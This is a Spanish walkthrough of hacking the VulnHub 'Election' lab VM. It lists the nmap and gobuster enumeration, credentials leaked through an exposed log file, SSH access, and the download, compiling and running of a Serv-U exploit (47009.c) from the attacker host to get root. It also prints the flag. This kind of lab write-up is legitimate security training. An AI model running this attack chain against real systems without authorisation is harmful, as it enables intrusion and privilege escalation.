[VLN] eLection

Hoy vamos a hackear la maquina de Vulnhub llamada Election. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/election-1,503/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.101 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 16:54 CEST Nmap scan report for election.home (192.168.1.101) Host is up (0.019s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA) | 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA) |_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
    Echamos un vistazo al fichero robots.txt del servidor Apache, que se encuentra en: http://192.168.1.101/robots.txt Contiene lo siguiente:
    admin wordpress user election
    Vemos que hay un directorio que se llama "election", asi que usamos gobuster para indagar un poco mas.
    ~ > gobuster dir -u http://192.168.1.101/election -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.101/election [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/26 17:07:18 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /admin (Status: 301) /data (Status: 301) /js (Status: 301) /languages (Status: 301) /lib (Status: 301) /media (Status: 301) /themes (Status: 301) =============================================================== 2020/07/26 17:07:22 Finished ===============================================================
    Nos devuelve varios directorios, aunque por el nombre, el mas interesante es admin. Volvemos a usar gobuster.
    ~ > gobuster dir -u http://192.168.1.101/election/admin -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.101/election/admin [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/26 17:08:03 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /ajax (Status: 301) /components (Status: 301) /css (Status: 301) /img (Status: 301) /inc (Status: 301) /js (Status: 301) /logs (Status: 301) /plugins (Status: 301) =============================================================== 2020/07/26 17:08:06 Finished ===============================================================
    Nos aparece el directorio logs! Si visitamos: http://192.168.1.101/election/admin/logs/ vemos que hay un fichero llamado system.log. Al descargarlo, vemos que contiene:
    [2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123 [2020-04-03 00:13:53] Love added candidate 'Love'. [2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
    Podemos ver unos posibles credenciales. love/P@$$w0rd@123 Probamos a conectarnos por ssh.
  • Low Shell
  • ~ > ssh love@192.168.1.101 The authenticity of host '192.168.1.101 (192.168.1.101)' can't be established. ECDSA key fingerprint is SHA256:erz9C9WEWhhV5KMnnpxYEiDQ015ORbFLU/4HNeyevdQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.101' (ECDSA) to the list of known hosts. love@192.168.1.101's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * "If you've been waiting for the perfect Kubernetes dev solution for macOS, the wait is over. Learn how to install Microk8s on macOS." https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/ * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 74 packages can be updated. 28 updates are security updates. Your Hardware Enablement Stack (HWE) is supported until April 2023. Last login: Thu Apr 9 23:19:28 2020 from 192.168.1.5 love@election:~$
    Echamos un vistazo al sistema.
    love@election:~$ find / -perm -4000 2>/dev/null ---SNIP--- /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/sbin/pppd /usr/local/Serv-U/Serv-U /usr/lib/policykit-1/polkit-agent-helper-1 /bin/fusermount ---SNIP----
    Hay un ejecutable que llama la atencion, "Serv-U". Tras buscar, encontramos un exploit[1] que puede servirnos. Lo descargamos en nuestra maquina, y lo transferimos a la maquina victima.
  • Privilege Escalation
  • love@election:~$ wget http://192.168.1.111/47009.c --2020-07-26 20:51:47-- http://192.168.1.111/47009.c Connecting to 192.168.1.111:80... connected. HTTP request sent, awaiting response... 200 OK Length: 619 [application/octet-stream] Saving to: ‘47009.c’ 47009.c 100%[=========================>] 619 --.-KB/s in 0s 2020-07-26 20:51:47 (85.6 MB/s) - ‘47009.c’ saved [619/619]
    Compilamos!
    love@election:~$ gcc -o go 47009.c
    Y ejecutamos :)
    love@election:~$ ./go uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),12 6(sambashare),1000(love) opening root shell # id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),12 6(sambashare),1000(love)
  • root.txt
  • # cd /root # ls root.txt # cat root.txt 5238feefc4ffe09645d97e9ee49bc3a6
  • End
  • Y con esto ya seriamos root de la maquina : [1]https://www.exploit-db.com/exploits/47009